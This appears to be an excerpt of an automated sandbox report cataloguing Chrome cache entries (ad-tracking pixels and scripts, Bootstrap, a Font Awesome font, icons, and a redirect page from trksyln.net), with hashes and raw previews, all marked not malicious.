URL:	https://cm.g.doubleclick.net/pixel?google_nid=simplifi&google_hm=39F8AD7435EC43369D67DAA35699A1F7&google_push=AXcoOmSIhx_awINzXgzYWs7Ldkdetu8Y-SBwDodzM3mFTtUbrbhkp0OS6hSo2f96raiQfkDC1lzy9png7PoLVky3HNMKBXYnTJqxnD8
Preview:	.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..

Chrome Cache Entry: 297

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with CRLF line terminators
Category:	downloaded
Size (bytes):	70
Entropy (8bit):	4.691494403886478
Encrypted:	false
SSDEEP:	3:qVoBzEHjJMzVJu+1i7XaXF9jb:q4IMRJVi7qXFtb
MD5:	743AF61F4FC1B261560694570F0A0D6A
SHA1:	20AAADB4041BD3ECB15525A7C8DDDF5ED5F186D8
SHA-256:	502EDF90CC75128B152612ACBCA431D3322459416E25064E5866548883A8922C
SHA-512:	749F452843DF44FC5DFB9133DC3BF3F78EB38A6FA9177189F4CF18EC41D14E7CE82E973EDACC82B22DCBC9A7FC815A03330A3D981C9DBF3D7A238868A70CBA12
Malicious:	false
Reputation:	unknown
URL:	https://trksyln.net/tgmacro/download
Preview:	<html>..<meta http-equiv="refresh" content="0; URL=/Error" />..</html>

Chrome Cache Entry: 298

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (4158)
Category:	downloaded
Size (bytes):	182435
Entropy (8bit):	5.501612649847176
Encrypted:	false
SSDEEP:	3072:jbtEWyenHYGwdwCrDTdS4bp41p2nF58Ni1YtFrD1XgQqnbZfahtFJz1m2MDIV0MM:jbtEWyenHYGwdwCrDTdS4bu1pWFONi1d
MD5:	EC759CF5D428B344EFF2AD4F7B20DD08
SHA1:	50D3396B5F9C38811A0EEA6678F30693997C2907
SHA-256:	94D7B3DC463F3C21D4F0503418E0FED038F9F233424163D74DAB12568E620685
SHA-512:	CA8C5985D11C000BBD724D9F290E3DE6EA2A63984630E792C5C75E5B5B60AEC0E4F44D219A288F6CE11FE5F60EFEB8D73BD1A6FFA98BACCCD421FC05CA6F57CE
Malicious:	false
Reputation:	unknown
URL:	https://pagead2.googlesyndication.com/pagead/managed/js/adsense/m202410240101/reactive_library_fy2021.js
Preview:	(function(sttc){'use strict';var r,aa=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype\|\|a==Object.prototype)return a;a[b]=c.value;return a};function ba(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");} .var ca=ba(this),da=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",ea={},fa={};function ha(a,b,c){if(!c\|\|a!=null){c=fa[b];if(c==null)return a[b];c=a[c];return c!==void 0?c:a[b]}} .function ia(a,b,c){if(b)a:{var d=a.split(".");a=d.length===1;var e=d[0],f;!a&&e in ea?f=ea:f=ca;for(e=0;e<d.length-1;e++){var g=d[e];if(!(g in f))break a;f=f[g]}d=d[d.length-1];c=da&&c==="es6"?f[d]:null;b=b(c);b!=null&&(a?aa(ea,d,{configurable:!0,writable:!0,value:b}):b!==c&&(fa[d]===void 0&&(a=Math.random()*1E9>>>0,fa[d]=da?ca.Symbol(d):"$jscp$"+a+"

Chrome Cache Entry: 299

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows icon resource - 3 icons, 16x16, 32 bits/pixel, 32x32, 32 bits/pixel
Category:	dropped
Size (bytes):	15406
Entropy (8bit):	3.9650904047414803
Encrypted:	false
SSDEEP:	96:vqjLLciHMHlbQo4Sy9S6IXl2qsl+PlBaEK4NySkc:vqrsH+Xj9NYocT2Skc
MD5:	59382DD7DA8079DD45A8748ABDBBC76B
SHA1:	508364D967AAA97168C5E1801CC24D0DA9C24D1E
SHA-256:	DD8B5FBD942B954BF9AB87579DB1092B0AEBCBA2D5B31ABC68918A11341FF333
SHA-512:	C681FBD11D3D89B97C53D62D2A2399098808BF56DE32B4D5395B5002CF3287A6B2ED04E5FB94A18F60585678FE211480F893B420B95B7FDFEC3D234E67493325
Malicious:	false
Reputation:	unknown
Preview:	............ .h...6... .... .(.......00.... .h&......(....... ..... .........................fff....~................................................~fff....z...........................................................z.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................\|......

Chrome Cache Entry: 300

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	C++ source, ASCII text, with very long lines (2873)
Category:	downloaded
Size (bytes):	9031
Entropy (8bit):	5.527216820529872
Encrypted:	false
SSDEEP:	192:B1/6bZSDg3eksiGBpuMo5gXKl7LOjbke3CT2itXedSlFI:B1/6bZSDqeYGBbnal7LCbkkCT2oXedS8
MD5:	0A69A7A3530DE318072DE6182E31A0C6
SHA1:	9BF1165A0064FB85DD8F29DDC6C45AD5B9574EE9
SHA-256:	BF1E2557855835794A8A1D9C1403AC53373CCEA3006325357E5CB384E93D7514
SHA-512:	9B24B0255A19285BF345BB199BAFF4DCCACBB55521FA0581E2AB196D5C28EC936749C6F9A21233261CBDE37033DA5C91D7F03A3A1FE4B25D8F325A7717760740
Malicious:	false
Reputation:	unknown
URL:	https://googleads.g.doubleclick.net/pagead/html/r20241028/r20190131/zrt_lookup_fy2021.html
Preview:	<!DOCTYPE html><script>.(function(){'use strict';/.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0./.var l=this\|\|self;var m,n;a:{for(var aa=["CLOSURE_FLAGS"],v=l,z=0;z<aa.length;z++)if(v=v[aa[z]],v==null){n=null;break a}n=v}var ba=n&&n[610401301];m=ba!=null?ba:!1;function ca(){var a=l.navigator;return a&&(a=a.userAgent)?a:""}var A;const da=l.navigator;A=da?da.userAgentData\|\|null:null;function B(a){return m?A?A.brands.some(({brand:b})=>b&&b.indexOf(a)!=-1):!1:!1}function C(a){return ca().indexOf(a)!=-1};function E(){return m?!!A&&A.brands.length>0:!1}function F(){return E()?B("Chromium"):(C("Chrome")\|\|C("CriOS"))&&!(E()?0:C("Edge"))\|\|C("Silk")};function ea(a,b){Array.prototype.forEach.call(a,b,void 0)};function G(a){G[" "](a);return a}G[" "]=function(){};var fa=ca().toLowerCase().indexOf("webkit")!=-1&&!C("Edge");!C("Android")\|\|F();F();C("Safari")&&(F()\|\|(E()?0:C("Coast"))\|\|(E()?0:C("Opera"))\|\|(E()?0:C("Edge"))\|\|(E()?B("Microsoft Edge"):C("Edg/"))\|\|E()&&B

Chrome Cache Entry: 301

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	170
Entropy (8bit):	5.335916817166796
Encrypted:	false
SSDEEP:	3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
MD5:	E7673C60AF825466F83D46DA72CA1635
SHA1:	FC0FCBEE0835709BA2D28798A612BFD687903FB5
SHA-256:	0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
SHA-512:	F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..

Chrome Cache Entry: 302

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	170
Entropy (8bit):	5.335916817166796
Encrypted:	false
SSDEEP:	3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
MD5:	E7673C60AF825466F83D46DA72CA1635
SHA1:	FC0FCBEE0835709BA2D28798A612BFD687903FB5
SHA-256:	0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
SHA-512:	F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
Malicious:	false
Reputation:	unknown
URL:	https://cm.g.doubleclick.net/pixel?google_nid=yahoo&google_push=AXcoOmSC5XzHMFryMzDkGxghutUO-mvFIJ78eTpuHDkgVH0JaQqClGaoWQeMEbZOwXl-_6VPMlKnpXxaJBwSkNZeCT74kzVwrTTEcm0&google_hm=eS15MDF1d0VSRTJwR3VpcERhbjZhVkN6U2FPbHdJd0xjb35B
Preview:	.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..

Chrome Cache Entry: 303

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	C++ source, ASCII text, with very long lines (2015)
Category:	downloaded
Size (bytes):	40512
Entropy (8bit):	5.518199113824284
Encrypted:	false
SSDEEP:	768:8xMuZ0jicWJj1GV2eYcZOYnHKoOFAVUagrLG9JQcgNYTrfgUYyzkoDBRW0sbh3fK:A+xbYcAYb2ZT3ZE3
MD5:	1614EFD8D8B318CA80C151AA5D983224
SHA1:	E27E5A72190F00DDABC4187084B8BD3850388D05
SHA-256:	B682B162DDD14D549C16FDCC70C01AAF1A7C1C5EE9D12F8A45081CAF38499FF4
SHA-512:	32E34011CAD366D6AC1BB0FD694829D233C66BB51813596A8EA6631E2E8516A25308768C988E9866C6B868174E993BCB62443D92AFEAFC9209B0A1C30CECECAB
Malicious:	false
Reputation:	unknown
URL:	https://www.gstatic.com/mysidia/1614efd8d8b318ca80c151aa5d983224.js?tag=addon/mysidia_one_click_handler_one_afma
Preview:	(function(){/.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0./.var m=this\|\|self;const aa=(new Date("2024-01-01T00:00:00Z")).getTime();.function ba(a){a=a.s;const b=encodeURIComponent;let c="";a.platform&&(c+="&uap="+b(a.platform));a.platformVersion&&(c+="&uapv="+b(a.platformVersion));a.uaFullVersion&&(c+="&uafv="+b(a.uaFullVersion));a.architecture&&(c+="&uaa="+b(a.architecture));a.model&&(c+="&uam="+b(a.model));a.bitness&&(c+="&uab="+b(a.bitness));a.fullVersionList&&(c+="&uafvl="+b(a.fullVersionList.map(d=>b(d.brand)+";"+b(d.version)).join("\|")));typeof a.wow64!=="undefined"&&(c+="&uaw="+Number(a.wow64));return c}.function ca(a,b){return a.g?a.m.slice(0,a.g.index)+b+a.m.slice(a.g.index):a.m+b}function da(a,b=0){let c="&act=1";b===0?c+="&ri=1":b===1?c+="&ri=24":b===2&&(c+="&ri=25");a.l&&a.s&&(c+=ba(a));a.h&&(c+="&suid="+a.o);return ca(a,c)}function ea(a,b){if(a.l&&a.i){if(b==1)return a.i\|\|""}else if(a.h){if(b==1)return ca(a,"&dct=1&suid="+a.o);if(b==3)re

Chrome Cache Entry: 304

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (1875)
Category:	dropped
Size (bytes):	73462
Entropy (8bit):	5.570807633879379
Encrypted:	false
SSDEEP:	1536:d35XMc5e67JV7xoeTuqbg9Szvf4msUkRe6HFj:LXMUHVoeTuqzvTk86lj
MD5:	F57E90FBF722A9DF84FC38A1FDBE3508
SHA1:	A4C8DC02751F5809723DEAFD166969D2D5BACF27
SHA-256:	4EAE7C63CE735CEC03881270269471E56E709D5DA4951CB46AEA9AF1FC615099
SHA-512:	213259C958F1E4679D933370D369FC8C5C6F09C160F62027EA441F8DABE5676186EE3EA52570C3607F2E9719A1BCF9F7A4CA9356C107924BC5E5A5DC0E64D4A1
Malicious:	false
Reputation:	unknown
Preview:	(function(){function aa(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var ba=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype\|\|a==Object.prototype)return a;a[b]=c.value;return a}; .function ca(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var da=ca(this),ea=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",p={},fa={};function r(a,b,c){if(!c\|\|a!=null){c=fa[b];if(c==null)return a[b];c=a[c];return c!==void 0?c:a[b]}} .function t(a,b,c){if(b)a:{var e=a.split(".");a=e.length===1;var d=e[0],f;!a&&d in p?f=p:f=da;for(d=0;d<e.length-1;d++){var h=e[d];if(!(h in f))break a;f=f[h]}e=e[e.length-1];c=ea&&c==="es6"?f[e]:null;b=b(c);b!=null&&(a?ba(p,e,{configurable:!0,writable:!0,value:b}):b!==c&&(fa[e]==

Chrome Cache Entry: 305

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	170
Entropy (8bit):	5.335916817166796
Encrypted:	false
SSDEEP:	3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
MD5:	E7673C60AF825466F83D46DA72CA1635
SHA1:	FC0FCBEE0835709BA2D28798A612BFD687903FB5
SHA-256:	0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
SHA-512:	F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
Malicious:	false
Reputation:	unknown
URL:	https://cm.g.doubleclick.net/pixel?google_nid=baidu_mediago&google_push=AXcoOmSt9V-XvEosgwdO7hh7p0jmvZETv7AYYur3PP_0VA1kMD3uehc9zWkhZYvPw1d4cIrehwUweUItUNBJO3bWkfNSIgQy8JM9jQizFQ&google_hm=22210ca7ce1ae6f72pgi3e00m2xmr4i6
Preview:	.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..

Chrome Cache Entry: 306

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	170
Entropy (8bit):	5.335916817166796
Encrypted:	false
SSDEEP:	3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
MD5:	E7673C60AF825466F83D46DA72CA1635
SHA1:	FC0FCBEE0835709BA2D28798A612BFD687903FB5
SHA-256:	0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
SHA-512:	F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..

Chrome Cache Entry: 307

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (2200)
Category:	downloaded
Size (bytes):	23701
Entropy (8bit):	5.499820432715541
Encrypted:	false
SSDEEP:	384:PqTcq08AdYSAwhImk7eDivZSPoa5LjcOuq37BroWaIOXXhwpuy4yDCWyj/1gVfj5:Pqr0VdYSAX7ecMPoaNQOHdUWaIOX277t
MD5:	8E928C4BDDE1C53A613B419348556184
SHA1:	B08CB2310F2B4BC7EC489014E2F041A1AD7A5FBB
SHA-256:	D83AFDD078C43825E5173918368CE83C62082C7D10408D0B2D788B5B60CF0E2A
SHA-512:	49EA93EF9F60712DAC6610CCFDF19E48911266767F732F8B5A615326D29346B5C9E19B040E7CBBEB38A5A08DFDB76EEC86A4108C553BABD9E909245E851D619B
Malicious:	false
Reputation:	unknown
URL:	https://tpc.googlesyndication.com/pagead/js/r20241028/r20110914/abg_lite_fy2021.js
Preview:	(function(){'use strict';/* . . Copyright The Closure Library Authors. . SPDX-License-Identifier: Apache-2.0 .*/ .var m=this\|\|self;function aa(a){m.setTimeout(()=>{throw a;},0)};var ba,n;a:{for(var ca=["CLOSURE_FLAGS"],p=m,da=0;da<ca.length;da++)if(p=p[ca[da]],p==null){n=null;break a}n=p}var fa=n&&n[610401301];ba=fa!=null?fa:!1;var q;const ha=m.navigator;q=ha?ha.userAgentData\|\|null:null;function ia(a){return ba?q?q.brands.some(({brand:b})=>b&&b.indexOf(a)!=-1):!1:!1}function t(a){var b;a:{if(b=m.navigator)if(b=b.userAgent)break a;b=""}return b.indexOf(a)!=-1};function u(){return ba?!!q&&q.brands.length>0:!1}function ja(){return u()?ia("Chromium"):(t("Chrome")\|\|t("CriOS"))&&!(u()?0:t("Edge"))\|\|t("Silk")};function ka(a){ka[" "](a);return a}ka[" "]=function(){};!t("Android")\|\|ja();ja();t("Safari")&&(ja()\|\|(u()?0:t("Coast"))\|\|(u()?0:t("Opera"))\|\|(u()?0:t("Edge"))\|\|(u()?ia("Microsoft Edge"):t("Edg/"))\|\|u()&&ia("Opera"));let la;function ma(){const a=Error();a.__closure__error__context__98438

Chrome Cache Entry: 308

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65299)
Category:	dropped
Size (bytes):	78743
Entropy (8bit):	5.178440533196338
Encrypted:	false
SSDEEP:	1536:tp+1ZTPR2t4tXbih05ve8/pwgrEpc9t0vSAIAxCs:MFRIpk0vSAV
MD5:	0AA8D64E726C4A57ADB5C88F9115996B
SHA1:	901169527507FF9E662CF64D8E361F359308970D
SHA-256:	7E1F1503DF765CCA5E099891B94E318A2EF95081BA2AF1EB6D417CC884BFDBFE
SHA-512:	EF6583F7684BB3B4F91405E7DEF90D65F9561BAA609540C3A66F3B4DE4267D283C2A7AF298BD86DF447B6ACE05993C2182EF47EDE4B30C25F79A38AD49E70A9F
Malicious:	false
Reputation:	unknown
Preview:	/!. Bootstrap v5.0.2 (https://getbootstrap.com/). * Copyright 2011-2021 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/main/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?module.exports=e():"function"==typeof define&&define.amd?define(e):(t="undefined"!=typeof globalThis?globalThis:t\|\|self).bootstrap=e()}(this,(function(){"use strict";const t={find:(t,e=document.documentElement)=>[].concat(...Element.prototype.querySelectorAll.call(e,t)),findOne:(t,e=document.documentElement)=>Element.prototype.querySelector.call(e,t),children:(t,e)=>[].concat(...t.children).filter(t=>t.matches(e)),parents(t,e){const i=[];let n=t.parentNode;for(;n&&n.nodeType===Node.ELEMENT_NODE&&3!==n.nodeType;)n.matches(e)&&i.push(n),n=n.parentNode;return i},prev(t,e){let i=t.previousElementSibling;for(;i;){if(i.matches(e))return[i];i=i.previousElementSibling}return[]},next(t,e){let i=

Chrome Cache Entry: 309

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Web Open Font Format (Version 2), TrueType, length 157192, version 774.256
Category:	downloaded
Size (bytes):	157192
Entropy (8bit):	7.996404310886749
Encrypted:	true
SSDEEP:	3072:AeqpbFGFxHY0qqD6sTqOmtIw+eW7vMNhGRWcUJfiCE:A1ZUFJYsZOOmtIw+t7ShGRWDc
MD5:	76CF3FF0DBD23DD4504E2089F0DF4ACB
SHA1:	BD2958CF51CC0A7B5C11A0B5C84101F35C2799A0
SHA-256:	340E6D7F301471E307E50C2ED43FE45DEBC8EBBF24FEBEF17B24F0B06F8883F2
SHA-512:	C957943B64F990E24838268E3F1A6E6B4A583AEAC6B83588FC01D269A096A888FA4DC2E16E96D23C3A84D7EB0F498C5FBA55AACD966D0DCE7C5A50449431A49A
Malicious:	false
Reputation:	unknown
URL:	https://ka-f.fontawesome.com/releases/v6.6.0/webfonts/free-fa-solid-900.woff2
Preview:	wOF2......f.......)...e..........................6.$. .`..P...f.. .T..m. %.....L......y.....SA.....PUUUU5)!.1.v.....O~.._..w..._..............S`0...0-.q.=^.....~..L.^R.[..'..P..Be.)..W.U.......4......(..f.;....".z.h..ej..0....R:.,X.',.Usz.\.m..l}.Q..'t...{N.......r...VH...Nr..M.F."..n...?oF0".!.y1.$..D...n..~.g.d;$.c\|........d!VS......O..M%......G<!.. ........D..C.pQ.....T2.y......Gz.Gi.........U@...@.".._..f...'+..=..[u.VH.......fr..t....6.j.R..J..PF.J.....8H..14`...~K...&...oml....g..{.m.?`L........s...iR.iT.Y.*.....n8.......B...N.,.$.(.W ..wZ!QHk~.F..N^#.i."U..................@J..u.lZ.Ul.f\.8E.%.-pIi..u.u.5..~].k.w.K..z.A?O...~i3..Z.jwV.%.h.#..6...c.i.\ .F.9.(.RMZ5i.i]....}.;.......~.}G....V.N.S..y..xF.. ...^....7%4.MuZS..`..`.. .. . ...x.?..A.A..l..%+....~^.=...1....f$v.u.h+.....iO.i.[.q.(lW....C.G.)...{....r!.o.....j...h..w....7O g.....=#z..%..n...]p.l4.+.z5...B.......~..!.)..%==......U.oS.y49;.$.,.)v!.S..$.........{."....jJ.....i...D......j{.j.

Chrome Cache Entry: 310

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Unicode text, UTF-8 text, with very long lines (65306)
Category:	downloaded
Size (bytes):	155845
Entropy (8bit):	5.0596333050371385
Encrypted:	false
SSDEEP:	1536:d0bwW83RipVVsEBpy0cuJcf22RWb5CyVUpz600I4fM:d0bwlyVUpz600I4fM
MD5:	ABE91756D18B7CD60871A2F47C1E8192
SHA1:	7C1C9E0573E5CEA8BAD3733BE2FC63AA8C68EA8D
SHA-256:	7633B7C0C97D19E682FEEE8AFA2738523FCB2A14544A550572CAEECD2EEFE66B
SHA-512:	BAC54101DEBAFCDA5535F0607B5F60C2CDA3E896629E771AD76AC07B697E77E4242D4F5F886D363B55FC43A85EA48A6BFC460A66F2B1FC8F56B27BA326E3A604
Malicious:	false
Reputation:	unknown
URL:	https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/css/bootstrap.min.css
Preview:	@charset "UTF-8";/!. Bootstrap v5.0.2 (https://getbootstrap.com/). * Copyright 2011-2021 The Bootstrap Authors. * Copyright 2011-2021 Twitter, Inc.. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/main/LICENSE). */:root{--bs-blue:#0d6efd;--bs-indigo:#6610f2;--bs-purple:#6f42c1;--bs-pink:#d63384;--bs-red:#dc3545;--bs-orange:#fd7e14;--bs-yellow:#ffc107;--bs-green:#198754;--bs-teal:#20c997;--bs-cyan:#0dcaf0;--bs-white:#fff;--bs-gray:#6c757d;--bs-gray-dark:#343a40;--bs-primary:#0d6efd;--bs-secondary:#6c757d;--bs-success:#198754;--bs-info:#0dcaf0;--bs-warning:#ffc107;--bs-danger:#dc3545;--bs-light:#f8f9fa;--bs-dark:#212529;--bs-font-sans-serif:system-ui,-apple-system,"Segoe UI",Roboto,"Helvetica Neue",Arial,"Noto Sans","Liberation Sans",sans-serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol","Noto Color Emoji";--bs-font-monospace:SFMono-Regular,Menlo,Monaco,Consolas,"Liberation Mono","Courier New",monospace;--bs-gradient:linear-gradient(180deg, rgba(255, 255, 255,

Chrome Cache Entry: 311

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 128 x 128, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	3523
Entropy (8bit):	7.555351955838022
Encrypted:	false
SSDEEP:	48:lhntIzmwye2BpZ2MwU2DYCavSes39bnxk3jSOuw36ie/a+wDAO9+3Nri:3ntIznSZzF7rsxkx8a9+3N2
MD5:	69CD9682541959C91A58CB55C6FD44BA
SHA1:	DC6E1C1621F0B884BA4D044EC8ED2E6757C64333
SHA-256:	08F9FE85092CDCC7A7FC6435459A31A6F4FC844B27C5CC942B273202C7D7B1C2
SHA-512:	BD87ADB1DA8BD563E9870526A262FCE6CC4BB285513F6561318519B9ECD16B4DA5CD0EC65BC8E0527141CC6427BC03C97926C97A0704F744E57C9A819B14148B
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR.....................tEXtSoftware.www.inkscape.org..<.....pHYs............I....PLTEGpL...................................................3.................................................................................................................................................................................................................................................................#......Ua...3......kz............3......`n3...LV...2......#(.............."..1...GR.m}.(.'.. ..!...hw,..............OZ.'-.u..ws.ds....292..0....5\OM1..%..-..QFDA86.........G=; ../..5.,.8@80//..&........;C0..%...Yf.AJ.Q\.s.. $...-'&...j[Y........(...?H.q.qa^..{....}.."'.Xe....z....)..gYV&..!...FP....07....yu.ur...&...o.......$..zif(......w.......#....-...4<......(#!.qmsc`/)'...l]Z....}y.....,....,........MB@!..eWT.[hI?=.CM*..so2..~......zv0)(.].4...ktRNS...2..........l.;.A..........6q..7...'"..x...\....C....$.^u..K.)a.......nQ.f{4sT.=~....+cE.VNg.XB...6`......IDATx.

Chrome Cache Entry: 312

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	170
Entropy (8bit):	5.335916817166796
Encrypted:	false
SSDEEP:	3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
MD5:	E7673C60AF825466F83D46DA72CA1635
SHA1:	FC0FCBEE0835709BA2D28798A612BFD687903FB5
SHA-256:	0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
SHA-512:	F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..

Chrome Cache Entry: 313

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 128 x 128, 8-bit colormap, non-interlaced
Category:	downloaded
Size (bytes):	3523
Entropy (8bit):	7.555351955838022
Encrypted:	false
SSDEEP:	48:lhntIzmwye2BpZ2MwU2DYCavSes39bnxk3jSOuw36ie/a+wDAO9+3Nri:3ntIznSZzF7rsxkx8a9+3N2
MD5:	69CD9682541959C91A58CB55C6FD44BA
SHA1:	DC6E1C1621F0B884BA4D044EC8ED2E6757C64333
SHA-256:	08F9FE85092CDCC7A7FC6435459A31A6F4FC844B27C5CC942B273202C7D7B1C2
SHA-512:	BD87ADB1DA8BD563E9870526A262FCE6CC4BB285513F6561318519B9ECD16B4DA5CD0EC65BC8E0527141CC6427BC03C97926C97A0704F744E57C9A819B14148B
Malicious:	false
Reputation:	unknown
URL:	https://trksyln.net/resources/img/error.png
Preview:	.PNG........IHDR.....................tEXtSoftware.www.inkscape.org..<.....pHYs............I....PLTEGpL...................................................3.................................................................................................................................................................................................................................................................#......Ua...3......kz............3......`n3...LV...2......#(.............."..1...GR.m}.(.'.. ..!...hw,..............OZ.'-.u..ws.ds....292..0....5\OM1..%..-..QFDA86.........G=; ../..5.,.8@80//..&........;C0..%...Yf.AJ.Q\.s.. $...-'&...j[Y........(...?H.q.qa^..{....}.."'.Xe....z....)..gYV&..!...FP....07....yu.ur...&...o.......$..zif(......w.......#....-...4<......(#!.qmsc`/)'...l]Z....}y.....,....,........MB@!..eWT.[hI?=.CM*..so2..~......zv0)(.].4...ktRNS...2..........l.;.A..........6q..7...'"..x...\....C....$.^u..K.)a.......nQ.f{4sT.=~....+cE.VNg.XB...6`......IDATx.

Chrome Cache Entry: 314

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	170
Entropy (8bit):	5.335916817166796
Encrypted:	false
SSDEEP:	3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
MD5:	E7673C60AF825466F83D46DA72CA1635
SHA1:	FC0FCBEE0835709BA2D28798A612BFD687903FB5
SHA-256:	0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
SHA-512:	F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
Malicious:	false
Reputation:	unknown
URL:	https://cm.g.doubleclick.net/pixel?google_nid=ta&google_hm=Fyu-5GbPRWQ6ZIpuIUpEuw&google_push=AXcoOmSrY7ICbKSMUirrf7SY7fPPWmw6Wx0t2MDX6BAA8aQDy1xy3RAKRzdLj7nTAXJsX4R08bXl2xtQtgoiufKBt9jpDiLgb0-rFvw
